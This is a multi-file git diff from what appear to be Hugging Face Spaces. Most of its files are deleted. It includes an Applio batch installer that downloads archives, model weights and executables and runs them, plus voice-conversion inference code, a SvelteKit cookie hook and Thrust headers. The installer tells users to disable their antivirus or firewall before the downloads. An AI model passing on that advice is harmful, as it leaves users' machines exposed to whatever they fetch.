-:menu -for /f "delims=: tokens=*" %%A in ('findstr /b ":::" "%~f0"') do @echo(%%A - -echo [1] Reinstall Applio -echo [2] Update Applio -echo [3] Update Applio + Runtime -echo. - -set /p choice=Select an option: -set choice=%choice: =% - -if "%choice%"=="1" ( - cls - echo Starting Applio Reinstaller... - echo. - goto reinstaller - pause - cls - goto menu - -) - -if "%choice%"=="2" ( - cls - echo Starting Applio Updater... - echo. - goto updater - pause - cls - goto menu -) - -if "%choice%"=="3" ( - cls - echo Updating Applio + Runtime... - echo. - goto updaterRuntime - pause - cls - goto menu - -) - -cls -echo Invalid option. Please enter a number from 1 to 3. -echo. -echo Press 'Enter' to access the main menu... -pause>nul -cls -goto menu - -:reinstaller - -echo WARNING: Remember to install Microsoft C++ Build Tools, Redistributable, Python, and Git before continuing. -echo. -echo Step-by-step guide: https://rentry.org/appliolocal -echo Build Tools: https://aka.ms/vs/17/release/vs_BuildTools.exe -echo Redistributable: https://aka.ms/vs/17/release/vc_redist.x64.exe -echo Git: https://github.com/git-for-windows/git/releases/download/v2.42.0.windows.2/Git-2.42.0.2-64-bit.exe -echo Python: Add this route to the windows enviroment variables the user path variable: %principal%\runtime\Scripts -echo. -pause -cls - -echo Downloading ZIP file... -powershell -command "& { Invoke-WebRequest -Uri '%repoUrl%' -OutFile '%principal%\repo.zip' }" -echo. - -echo Extracting ZIP file... -powershell -command "& { Add-Type -AssemblyName System.IO.Compression.FileSystem ; [System.IO.Compression.ZipFile]::ExtractToDirectory('%principal%\repo.zip', '%principal%') }" -echo. - -echo Copying folder and file structure from subdirectory to main directory... -robocopy "%principal%\Applio-RVC-Fork-%branch%" "%principal%" /E -echo. - -echo Deleting contents of subdirectory (files and folders)... -rmdir "%principal%\Applio-RVC-Fork-%branch%" /S /Q -echo. - -echo Cleaning up... -del "%principal%\repo.zip" -echo. -cls - -echo Proceeding to download the models... -echo. - -echo WARNING: At this point, it's recommended to disable antivirus or firewall, as errors might occur when downloading pretrained models. -pause -cls - -echo Downloading models in the assets folder... -cd "assets" -echo. -echo Downloading the "pretrained" folder... -cd "pretrained" -curl -LJO "%URL_BASE%/pretrained/D32k.pth" -curl -LJO "%URL_BASE%/pretrained/D40k.pth" -curl -LJO "%URL_BASE%/pretrained/D48k.pth" -curl -LJO "%URL_BASE%/pretrained/G32k.pth" -curl -LJO "%URL_BASE%/pretrained/G40k.pth" -curl -LJO "%URL_BASE%/pretrained/G48k.pth" -curl -LJO "%URL_BASE%/pretrained/f0D32k.pth" -curl -LJO "%URL_BASE%/pretrained/f0D40k.pth" -curl -LJO "%URL_BASE%/pretrained/f0D48k.pth" -curl -LJO "%URL_BASE%/pretrained/f0G32k.pth" -curl -LJO "%URL_BASE%/pretrained/f0G40k.pth" -curl -LJO "%URL_BASE%/pretrained/f0G48k.pth" -cd ".." -echo. -cls - -echo Downloading the "pretrained_v2" folder... -cd "pretrained_v2" -curl -LJO "%URL_BASE%/pretrained_v2/D32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/D40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/D48k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/G32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/G40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/G48k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0D32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0D40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0D48k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0G32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0G40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0G48k.pth" -cd ".." -echo. -cls - -echo Downloading the hubert_base.pt file... -cd "hubert" -curl -LJO "%URL_BASE%/hubert_base.pt" -cd ".." -echo. -cls - - -echo Downloading the rmvpe.pt file... -cd "rmvpe" -curl -LJO "%URL_BASE%/rmvpe.pt" -echo. -cls - -echo Downloading the rmvpe.onnx file... -curl -LJO "%URL_BASE%/rmvpe.onnx" -cd ".." -cd ".." -echo. -cls - -echo Downloading the rest of the large files - -echo Downloading the "uvr5_weights" folder... -cd "uvr5_weights" -curl -LJO "%URL_BASE%/uvr5_weights/HP2_all_vocals.pth" -curl -LJO "%URL_BASE%/uvr5_weights/HP3_all_vocals.pth" -curl -LJO "%URL_BASE%/uvr5_weights/HP5_only_main_vocal.pth" -curl -LJO "%URL_BASE%/uvr5_weights/VR-DeEchoAggressive.pth" -curl -LJO "%URL_BASE%/uvr5_weights/VR-DeEchoDeReverb.pth" -curl -LJO "%URL_BASE%/uvr5_weights/VR-DeEchoNormal.pth" -cd ".." -echo. -cls - -echo Downloading the ffmpeg.exe file... -curl -LJO "%URL_BASE%/ffmpeg.exe" -echo. -cls - -echo Downloading the ffprobe.exe file... -curl -LJO "%URL_BASE%/ffprobe.exe" -echo. -cls - -echo Downloading the runtime.zip file... -curl -LJO "%URL_EXTRA%/%runtime%.zip" -echo. -cls - -echo Extracting the runtime.zip file, this might take a while... -powershell -Command "Expand-Archive -Path '%runtime%.zip' -DestinationPath '.'" -del %runtime%.zip -echo. -cls - -echo Downloads completed! -echo. - -echo Checking if the local_fixes.py file exists in the Fixes folder... -if exist "%fixesFolder%\%localFixesPy%" ( - echo Running the file... - runtime\python.exe "%fixesFolder%\%localFixesPy%" -) else ( - echo The "%localFixesPy%" file was not found in the "Fixes" folder. -) -echo. - -echo Fixes Applied! -echo. - -echo Applio has been reinstalled! -echo. -echo Press 'Enter' to access the main menu... -pause>nul -cls -goto menu - - -:updater - -echo Downloading the ZIP file... -powershell -command "& { Invoke-WebRequest -Uri '%repoUrl%' -OutFile '%principal%\repo.zip' }" -echo. - -echo Extracting ZIP file... -powershell -command "& { Add-Type -AssemblyName System.IO.Compression.FileSystem ; [System.IO.Compression.ZipFile]::ExtractToDirectory('%principal%\repo.zip', '%principal%') }" -echo. - -echo Copying folder and file structure from subdirectory to main directory... -robocopy "%principal%\Applio-RVC-Fork-%branch%" "%principal%" /E -echo. - -echo Deleting contents of the subdirectory (files and folders)... -rmdir "%principal%\Applio-RVC-Fork-%branch%" /S /Q -echo. - -echo Cleaning up... -del "%principal%\repo.zip" -echo. -cls - -echo Verifying if the local_fixes.py file exists in the Fixes folder... -if exist "%fixesFolder%\%localFixesPy%" ( - echo Running the file... - runtime\python.exe "%fixesFolder%\%localFixesPy%" -) else ( - echo The file "%localFixesPy%" was not found in the "Fixes" folder. -) -echo. - -echo Applio has been updated! -echo. -echo Press 'Enter' to access the main menu... -pause>nul -cls -goto menu - - -:updaterRuntime - -echo Downloading the ZIP file... -powershell -command "& { Invoke-WebRequest -Uri '%repoUrl%' -OutFile '%principal%\repo.zip' }" -echo. - -echo Extracting ZIP file... -powershell -command "& { Add-Type -AssemblyName System.IO.Compression.FileSystem ; [System.IO.Compression.ZipFile]::ExtractToDirectory('%principal%\repo.zip', '%principal%') }" -echo. - -echo Copying folder and file structure from subdirectory to main directory... -robocopy "%principal%\Applio-RVC-Fork-%branch%" "%principal%" /E -echo. - -echo Deleting contents of the subdirectory (files and folders)... -rmdir "%principal%\Applio-RVC-Fork-%branch%" /S /Q -echo. - -echo Cleaning up... -del "%principal%\repo.zip" -echo. -cls - -echo Downloading the runtime.zip file... -curl -LJO "%URL_EXTRA%/%runtime%.zip" -echo. -cls -echo Extracting the runtime.zip file, this might take a while... -powershell -Command "Expand-Archive -Path '%runtime%.zip' -DestinationPath '.'" -del runtime.zip -echo. -cls - -echo Verifying if the local_fixes.py file exists in the Fixes folder... -if exist "%fixesFolder%\%localFixesPy%" ( - echo Running the file... - runtime\python.exe "%fixesFolder%\%localFixesPy%" -) else ( - echo The file "%localFixesPy%" was not found in the "Fixes" folder. -) -echo. - -echo Applio has been updated! -echo. -echo Press 'Enter' to access the main menu... -pause>nul -cls -goto menu diff --git a/spaces/BartPoint/VoiceChange_Beta/vc_infer_pipeline.py b/spaces/BartPoint/VoiceChange_Beta/vc_infer_pipeline.py deleted file mode 100644 index 82c15f59a8072e1b317fa1d750ccc1b814a6989d..0000000000000000000000000000000000000000 --- a/spaces/BartPoint/VoiceChange_Beta/vc_infer_pipeline.py +++ /dev/null @@ -1,443 +0,0 @@ -import numpy as np, parselmouth, torch, pdb, sys, os -from time import time as ttime -import torch.nn.functional as F -import scipy.signal as signal -import pyworld, os, traceback, faiss, librosa, torchcrepe -from scipy import signal -from functools import lru_cache - -now_dir = os.getcwd() -sys.path.append(now_dir) - -bh, ah = signal.butter(N=5, Wn=48, btype="high", fs=16000) - -input_audio_path2wav = {} - - -@lru_cache -def cache_harvest_f0(input_audio_path, fs, f0max, f0min, frame_period): - audio = input_audio_path2wav[input_audio_path] - f0, t = pyworld.harvest( - audio, - fs=fs, - f0_ceil=f0max, - f0_floor=f0min, - frame_period=frame_period, - ) - f0 = pyworld.stonemask(audio, f0, t, fs) - return f0 - - -def change_rms(data1, sr1, data2, sr2, rate): # 1是输入音频,2是输出音频,rate是2的占比 - # print(data1.max(),data2.max()) - rms1 = librosa.feature.rms( - y=data1, frame_length=sr1 // 2 * 2, hop_length=sr1 // 2 - ) # 每半秒一个点 - rms2 = librosa.feature.rms(y=data2, frame_length=sr2 // 2 * 2, hop_length=sr2 // 2) - rms1 = torch.from_numpy(rms1) - rms1 = F.interpolate( - rms1.unsqueeze(0), size=data2.shape[0], mode="linear" - ).squeeze() - rms2 = torch.from_numpy(rms2) - rms2 = F.interpolate( - rms2.unsqueeze(0), size=data2.shape[0], mode="linear" - ).squeeze() - rms2 = torch.max(rms2, torch.zeros_like(rms2) + 1e-6) - data2 *= ( - torch.pow(rms1, torch.tensor(1 - rate)) - * torch.pow(rms2, torch.tensor(rate - 1)) - ).numpy() - return data2 - - -class VC(object): - def __init__(self, tgt_sr, config): - self.x_pad, self.x_query, self.x_center, self.x_max, self.is_half = ( - config.x_pad, - config.x_query, - config.x_center, - config.x_max, - config.is_half, - ) - self.sr = 16000 # hubert输入采样率 - self.window = 160 # 每帧点数 - self.t_pad = self.sr * self.x_pad # 每条前后pad时间 - self.t_pad_tgt = tgt_sr * self.x_pad - self.t_pad2 = self.t_pad * 2 - self.t_query = self.sr * self.x_query # 查询切点前后查询时间 - self.t_center = self.sr * self.x_center # 查询切点位置 - self.t_max = self.sr * self.x_max # 免查询时长阈值 - self.device = config.device - - def get_f0( - self, - input_audio_path, - x, - p_len, - f0_up_key, - f0_method, - filter_radius, - inp_f0=None, - ): - global input_audio_path2wav - time_step = self.window / self.sr * 1000 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - if f0_method == "pm": - f0 = ( - parselmouth.Sound(x, self.sr) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=f0_min, - pitch_ceiling=f0_max, - ) - .selected_array["frequency"] - ) - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad( - f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant" - ) - elif f0_method == "harvest": - input_audio_path2wav[input_audio_path] = x.astype(np.double) - f0 = cache_harvest_f0(input_audio_path, self.sr, f0_max, f0_min, 10) - if filter_radius > 2: - f0 = signal.medfilt(f0, 3) - elif f0_method == "crepe": - model = "full" - # Pick a batch size that doesn't cause memory errors on your gpu - batch_size = 512 - # Compute pitch using first gpu - audio = torch.tensor(np.copy(x))[None].float() - f0, pd = torchcrepe.predict( - audio, - self.sr, - self.window, - f0_min, - f0_max, - model, - batch_size=batch_size, - device=self.device, - return_periodicity=True, - ) - pd = torchcrepe.filter.median(pd, 3) - f0 = torchcrepe.filter.mean(f0, 3) - f0[pd < 0.1] = 0 - f0 = f0[0].cpu().numpy() - elif f0_method == "rmvpe": - if hasattr(self, "model_rmvpe") == False: - from rmvpe import RMVPE - - print("loading rmvpe model") - self.model_rmvpe = RMVPE( - "rmvpe.pt", is_half=self.is_half, device=self.device - ) - f0 = self.model_rmvpe.infer_from_audio(x, thred=0.03) - f0 *= pow(2, f0_up_key / 12) - # with open("test.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - tf0 = self.sr // self.window # 每秒f0点数 - if inp_f0 is not None: - delta_t = np.round( - (inp_f0[:, 0].max() - inp_f0[:, 0].min()) * tf0 + 1 - ).astype("int16") - replace_f0 = np.interp( - list(range(delta_t)), inp_f0[:, 0] * 100, inp_f0[:, 1] - ) - shape = f0[self.x_pad * tf0 : self.x_pad * tf0 + len(replace_f0)].shape[0] - f0[self.x_pad * tf0 : self.x_pad * tf0 + len(replace_f0)] = replace_f0[ - :shape - ] - # with open("test_opt.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - f0bak = f0.copy() - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / ( - f0_mel_max - f0_mel_min - ) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0bak # 1-0 - - def vc( - self, - model, - net_g, - sid, - audio0, - pitch, - pitchf, - times, - index, - big_npy, - index_rate, - version, - protect, - ): # ,file_index,file_big_npy - feats = torch.from_numpy(audio0) - if self.is_half: - feats = feats.half() - else: - feats = feats.float() - if feats.dim() == 2: # double channels - feats = feats.mean(-1) - assert feats.dim() == 1, feats.dim() - feats = feats.view(1, -1) - padding_mask = torch.BoolTensor(feats.shape).to(self.device).fill_(False) - - inputs = { - "source": feats.to(self.device), - "padding_mask": padding_mask, - "output_layer": 9 if version == "v1" else 12, - } - t0 = ttime() - with torch.no_grad(): - logits = model.extract_features(**inputs) - feats = model.final_proj(logits[0]) if version == "v1" else logits[0] - if protect < 0.5 and pitch != None and pitchf != None: - feats0 = feats.clone() - if ( - isinstance(index, type(None)) == False - and isinstance(big_npy, type(None)) == False - and index_rate != 0 - ): - npy = feats[0].cpu().numpy() - if self.is_half: - npy = npy.astype("float32") - - # _, I = index.search(npy, 1) - # npy = big_npy[I.squeeze()] - - score, ix = index.search(npy, k=8) - weight = np.square(1 / score) - weight /= weight.sum(axis=1, keepdims=True) - npy = np.sum(big_npy[ix] * np.expand_dims(weight, axis=2), axis=1) - - if self.is_half: - npy = npy.astype("float16") - feats = ( - torch.from_numpy(npy).unsqueeze(0).to(self.device) * index_rate - + (1 - index_rate) * feats - ) - - feats = F.interpolate(feats.permute(0, 2, 1), scale_factor=2).permute(0, 2, 1) - if protect < 0.5 and pitch != None and pitchf != None: - feats0 = F.interpolate(feats0.permute(0, 2, 1), scale_factor=2).permute( - 0, 2, 1 - ) - t1 = ttime() - p_len = audio0.shape[0] // self.window - if feats.shape[1] < p_len: - p_len = feats.shape[1] - if pitch != None and pitchf != None: - pitch = pitch[:, :p_len] - pitchf = pitchf[:, :p_len] - - if protect < 0.5 and pitch != None and pitchf != None: - pitchff = pitchf.clone() - pitchff[pitchf > 0] = 1 - pitchff[pitchf < 1] = protect - pitchff = pitchff.unsqueeze(-1) - feats = feats * pitchff + feats0 * (1 - pitchff) - feats = feats.to(feats0.dtype) - p_len = torch.tensor([p_len], device=self.device).long() - with torch.no_grad(): - if pitch != None and pitchf != None: - audio1 = ( - (net_g.infer(feats, p_len, pitch, pitchf, sid)[0][0, 0]) - .data.cpu() - .float() - .numpy() - ) - else: - audio1 = ( - (net_g.infer(feats, p_len, sid)[0][0, 0]).data.cpu().float().numpy() - ) - del feats, p_len, padding_mask - if torch.cuda.is_available(): - torch.cuda.empty_cache() - t2 = ttime() - times[0] += t1 - t0 - times[2] += t2 - t1 - return audio1 - - def pipeline( - self, - model, - net_g, - sid, - audio, - input_audio_path, - times, - f0_up_key, - f0_method, - file_index, - # file_big_npy, - index_rate, - if_f0, - filter_radius, - tgt_sr, - resample_sr, - rms_mix_rate, - version, - protect, - f0_file=None, - ): - if ( - file_index != "" - # and file_big_npy != "" - # and os.path.exists(file_big_npy) == True - and os.path.exists(file_index) == True - and index_rate != 0 - ): - try: - index = faiss.read_index(file_index) - # big_npy = np.load(file_big_npy) - big_npy = index.reconstruct_n(0, index.ntotal) - except: - traceback.print_exc() - index = big_npy = None - else: - index = big_npy = None - audio = signal.filtfilt(bh, ah, audio) - audio_pad = np.pad(audio, (self.window // 2, self.window // 2), mode="reflect") - opt_ts = [] - if audio_pad.shape[0] > self.t_max: - audio_sum = np.zeros_like(audio) - for i in range(self.window): - audio_sum += audio_pad[i : i - self.window] - for t in range(self.t_center, audio.shape[0], self.t_center): - opt_ts.append( - t - - self.t_query - + np.where( - np.abs(audio_sum[t - self.t_query : t + self.t_query]) - == np.abs(audio_sum[t - self.t_query : t + self.t_query]).min() - )[0][0] - ) - s = 0 - audio_opt = [] - t = None - t1 = ttime() - audio_pad = np.pad(audio, (self.t_pad, self.t_pad), mode="reflect") - p_len = audio_pad.shape[0] // self.window - inp_f0 = None - if hasattr(f0_file, "name") == True: - try: - with open(f0_file.name, "r") as f: - lines = f.read().strip("\n").split("\n") - inp_f0 = [] - for line in lines: - inp_f0.append([float(i) for i in line.split(",")]) - inp_f0 = np.array(inp_f0, dtype="float32") - except: - traceback.print_exc() - sid = torch.tensor(sid, device=self.device).unsqueeze(0).long() - pitch, pitchf = None, None - if if_f0 == 1: - pitch, pitchf = self.get_f0( - input_audio_path, - audio_pad, - p_len, - f0_up_key, - f0_method, - filter_radius, - inp_f0, - ) - pitch = pitch[:p_len] - pitchf = pitchf[:p_len] - if self.device == "mps": - pitchf = pitchf.astype(np.float32) - pitch = torch.tensor(pitch, device=self.device).unsqueeze(0).long() - pitchf = torch.tensor(pitchf, device=self.device).unsqueeze(0).float() - t2 = ttime() - times[1] += t2 - t1 - for t in opt_ts: - t = t // self.window * self.window - if if_f0 == 1: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[s : t + self.t_pad2 + self.window], - pitch[:, s // self.window : (t + self.t_pad2) // self.window], - pitchf[:, s // self.window : (t + self.t_pad2) // self.window], - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - else: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[s : t + self.t_pad2 + self.window], - None, - None, - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - s = t - if if_f0 == 1: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[t:], - pitch[:, t // self.window :] if t is not None else pitch, - pitchf[:, t // self.window :] if t is not None else pitchf, - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - else: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[t:], - None, - None, - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - audio_opt = np.concatenate(audio_opt) - if rms_mix_rate != 1: - audio_opt = change_rms(audio, 16000, audio_opt, tgt_sr, rms_mix_rate) - if resample_sr >= 16000 and tgt_sr != resample_sr: - audio_opt = librosa.resample( - audio_opt, orig_sr=tgt_sr, target_sr=resample_sr - ) - audio_max = np.abs(audio_opt).max() / 0.99 - max_int16 = 32768 - if audio_max > 1: - max_int16 /= audio_max - audio_opt = (audio_opt * max_int16).astype(np.int16) - del pitch, pitchf, sid - if torch.cuda.is_available(): - torch.cuda.empty_cache() - return audio_opt diff --git a/spaces/BetterAPI/BetterChat_new/src/hooks.server.ts b/spaces/BetterAPI/BetterChat_new/src/hooks.server.ts deleted file mode 100644 index 04cc75cac042fda3cabd7244584ae9aa5bf2a46f..0000000000000000000000000000000000000000 --- a/spaces/BetterAPI/BetterChat_new/src/hooks.server.ts +++ /dev/null @@ -1,37 +0,0 @@ -import { dev } from "$app/environment"; -import { COOKIE_NAME } from "$env/static/private"; -import type { Handle } from "@sveltejs/kit"; -import { PUBLIC_GOOGLE_ANALYTICS_ID } from "$env/static/public"; -import { addYears } from "date-fns"; - -export const handle: Handle = async ({ event, resolve }) => { - const token = event.cookies.get(COOKIE_NAME); - - event.locals.sessionId = token || crypto.randomUUID(); - - // Refresh cookie expiration date - event.cookies.set(COOKIE_NAME, event.locals.sessionId, { - path: "/", - // So that it works inside the space's iframe - sameSite: dev ? "lax" : "none", - secure: !dev, - httpOnly: true, - expires: addYears(new Date(), 1), - }); - - let replaced = false; - - const response = await resolve(event, { - transformPageChunk: (chunk) => { - // For some reason, Sveltekit doesn't let us load env variables from .env in the app.html template - if (replaced || !chunk.html.includes("%gaId%")) { - return chunk.html; - } - replaced = true; - - return chunk.html.replace("%gaId%", PUBLIC_GOOGLE_ANALYTICS_ID); - }, - }); - - return response; -}; diff --git a/spaces/BillBojangeles2000/WikiGPT/README.md b/spaces/BillBojangeles2000/WikiGPT/README.md deleted file mode 100644 index d7b841426bcaffad9d751fd2134aef2fc02d1812..0000000000000000000000000000000000000000 --- a/spaces/BillBojangeles2000/WikiGPT/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Karki TEST -emoji: 🐠 -colorFrom: blue -colorTo: red -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/structures/__init__.py b/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/structures/__init__.py deleted file mode 100644 index e7eef0005151406d7b74433f49075a8bb5a213f9..0000000000000000000000000000000000000000 --- a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/structures/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -from .boxes import Boxes, BoxMode, pairwise_iou -from .image_list import ImageList -from .instances import Instances -from .keypoints import Keypoints, heatmaps_to_keypoints -from .masks import BitMasks, PolygonMasks, rasterize_polygons_within_box, polygons_to_bitmask -from .rotated_boxes import RotatedBoxes -from .rotated_boxes import pairwise_iou as pairwise_iou_rotated - -__all__ = [k for k in globals().keys() if not k.startswith("_")] diff --git a/spaces/CVPR/LIVE/thrust/thrust/mr/sync_pool.h b/spaces/CVPR/LIVE/thrust/thrust/mr/sync_pool.h deleted file mode 100644 index 9cf8640cab158b87bc806976b6f10d1ec0a6e7c0..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/mr/sync_pool.h +++ /dev/null @@ -1,116 +0,0 @@ -/* - * Copyright 2018 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -/*! \file sync_pool.h - * \brief A mutex-synchronized version of \p unsynchronized_pool_resource. - */ - -#pragma once - -#include - -#if THRUST_CPP_DIALECT >= 2011 - -#include - -#include - -namespace thrust -{ -namespace mr -{ - -/*! \addtogroup memory_management Memory Management - * \addtogroup memory_management_classes Memory Management Classes - * \addtogroup memory_resources Memory Resources - * \ingroup memory_resources - * \{ - */ - -/*! A mutex-synchronized version of \p unsynchronized_pool_resource. Uses \p std::mutex, and therefore requires C++11. - * - * \tparam Upstream the type of memory resources that will be used for allocating memory - */ -template -struct synchronized_pool_resource : public memory_resource -{ - typedef unsynchronized_pool_resource unsync_pool; - typedef std::lock_guard lock_t; - - typedef typename Upstream::pointer void_ptr; - -public: - /*! Get the default options for a pool. These are meant to be a sensible set of values for many use cases, - * and as such, may be tuned in the future. This function is exposed so that creating a set of options that are - * just a slight departure from the defaults is easy. - */ - static pool_options get_default_options() - { - return unsync_pool::get_default_options(); - } - - /*! Constructor. - * - * \param upstream the upstream memory resource for allocations - * \param options pool options to use - */ - synchronized_pool_resource(Upstream * upstream, pool_options options = get_default_options()) - : upstream_pool(upstream, options) - { - } - - /*! Constructor. The upstream resource is obtained by calling \p get_global_resource. - * - * \param options pool options to use - */ - synchronized_pool_resource(pool_options options = get_default_options()) - : upstream_pool(get_global_resource(), options) - { - } - - /*! Releases all held memory to upstream. - */ - void release() - { - lock_t lock(mtx); - upstream_pool.release(); - } - - THRUST_NODISCARD virtual void_ptr do_allocate(std::size_t bytes, std::size_t alignment = THRUST_MR_DEFAULT_ALIGNMENT) THRUST_OVERRIDE - { - lock_t lock(mtx); - return upstream_pool.do_allocate(bytes, alignment); - } - - virtual void do_deallocate(void_ptr p, std::size_t n, std::size_t alignment = THRUST_MR_DEFAULT_ALIGNMENT) THRUST_OVERRIDE - { - lock_t lock(mtx); - upstream_pool.do_deallocate(p, n, alignment); - } - -private: - std::mutex mtx; - unsync_pool upstream_pool; -}; - -/*! \} - */ - -} // end mr -} // end thrust - -#endif // THRUST_CPP_DIALECT >= 2011 - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/logical.h b/spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/logical.h deleted file mode 100644 index c6ae90664ad9538e73febfde86c334011de417c8..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/logical.h +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system has no special version of this algorithm - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/mismatch.h b/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/mismatch.h deleted file mode 100644 index 50e9f678b1ff6a85c2d32e5ab45aed88a1c7224b..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/mismatch.h +++ /dev/null @@ -1,58 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - - -#pragma once - -#include -#include - -namespace thrust -{ -namespace system -{ -namespace detail -{ -namespace generic -{ - - -template -__host__ __device__ - thrust::pair - mismatch(thrust::execution_policy &exec, - InputIterator1 first1, - InputIterator1 last1, - InputIterator2 first2); - - -template -__host__ __device__ - thrust::pair - mismatch(thrust::execution_policy &exec, - InputIterator1 first1, - InputIterator1 last1, - InputIterator2 first2, - BinaryPredicate pred); - - -} // end namespace generic -} // end namespace detail -} // end namespace system -} // end namespace thrust - -#include - diff --git a/spaces/CVPR/SPOTER_Sign_Language_Recognition/spoter_mod/datasets/czech_slr_dataset.py b/spaces/CVPR/SPOTER_Sign_Language_Recognition/spoter_mod/datasets/czech_slr_dataset.py deleted file mode 100644 index 5ce737b8c3a5e9f6865a002d44393d6fc1dfae8a..0000000000000000000000000000000000000000 --- a/spaces/CVPR/SPOTER_Sign_Language_Recognition/spoter_mod/datasets/czech_slr_dataset.py +++ /dev/null @@ -1,153 +0,0 @@ -import ast -import torch - -import pandas as pd -import torch.utils.data as torch_data - -from random import randrange -from augmentations import * -from normalization.body_normalization import BODY_IDENTIFIERS -from normalization.hand_normalization import HAND_IDENTIFIERS -from normalization.body_normalization import normalize_single_dict as normalize_single_body_dict -from normalization.hand_normalization import normalize_single_dict as normalize_single_hand_dict - -HAND_IDENTIFIERS = [id + "_0" for id in HAND_IDENTIFIERS] + [id + "_1" for id in HAND_IDENTIFIERS] - -DEFAULT_AUGMENTATIONS_CONFIG = { - "rotate-angle": 13, - "perspective-transform-ratio": 0.1, - "squeeze-ratio": 0.15, - "arm-joint-rotate-angle": 4, - "arm-joint-rotate-probability": 0.3 -} - - -def load_dataset(file_location: str): - - # Load the datset csv file - df = pd.read_csv(file_location, encoding="utf-8") - - # TO BE DELETED - df.columns = [item.replace("_Left_", "_0_").replace("_Right_", "_1_") for item in list(df.columns)] - if "neck_X" not in df.columns: - df["neck_X"] = [0 for _ in range(df.shape[0])] - df["neck_Y"] = [0 for _ in range(df.shape[0])] - - # TEMP - labels = df["labels"].to_list() - labels = [label + 1 for label in df["labels"].to_list()] - data = [] - - for row_index, row in df.iterrows(): - current_row = np.empty(shape=(len(ast.literal_eval(row["leftEar_X"])), len(BODY_IDENTIFIERS + HAND_IDENTIFIERS), 2)) - for index, identifier in enumerate(BODY_IDENTIFIERS + HAND_IDENTIFIERS): - current_row[:, index, 0] = ast.literal_eval(row[identifier + "_X"]) - current_row[:, index, 1] = ast.literal_eval(row[identifier + "_Y"]) - - data.append(current_row) - - return data, labels - - -def tensor_to_dictionary(landmarks_tensor: torch.Tensor) -> dict: - - data_array = landmarks_tensor.numpy() - output = {} - - for landmark_index, identifier in enumerate(BODY_IDENTIFIERS + HAND_IDENTIFIERS): - output[identifier] = data_array[:, landmark_index] - - return output - - -def dictionary_to_tensor(landmarks_dict: 